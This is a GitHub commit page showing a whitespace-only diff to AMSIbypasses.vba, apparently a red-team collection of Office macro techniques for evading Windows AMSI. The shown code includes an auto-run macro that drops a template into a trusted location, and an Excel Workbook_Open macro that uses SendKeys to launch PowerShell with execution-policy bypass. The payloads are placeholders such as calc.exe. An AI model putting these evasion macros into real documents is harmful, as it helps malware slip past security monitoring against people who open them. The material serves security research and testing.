Skip to content

Commit

Permalink
Update AMSIbypasses.vba
Browse files Browse the repository at this point in the history
  • Loading branch information
stanhegt authored Apr 2, 2019
1 parent 3cb10d3 commit 6b8f582
Showing 1 changed file with 3 additions and 2 deletions.
5 changes: 3 additions & 2 deletions AMSIbypasses.vba
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,7 @@
' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)
' ##################################################################################

Sub autoopen()
'function called by the initial 'dropper' code, drops a dotm into %appdata\microsoft templates
curfile = ActiveDocument.Path & "\" & ActiveDocument.Name
Expand All @@ -25,18 +26,18 @@ End Sub
Sub autonew()
' this function is called from a trusted location, not in the AMSI logs
Shell "calc.exe"
End Sub
End Sub


' ##################################################################################
' AMSI Bypass approach that abuses Excel sendkeys to fireup the startmennu
' ##################################################################################

Private Sub Workbook_Open()
On Error Resume Next
Application.SendKeys "^{esc}"
Application.Wait (Now() + TimeValue("00:00:01"))
Application.SendKeys "powershell.exe -ep bypass read-host ""malicious"" ~"

End Sub

' ##################################################################################
Expand Down

0 comments on commit 6b8f582

Please sign in to comment.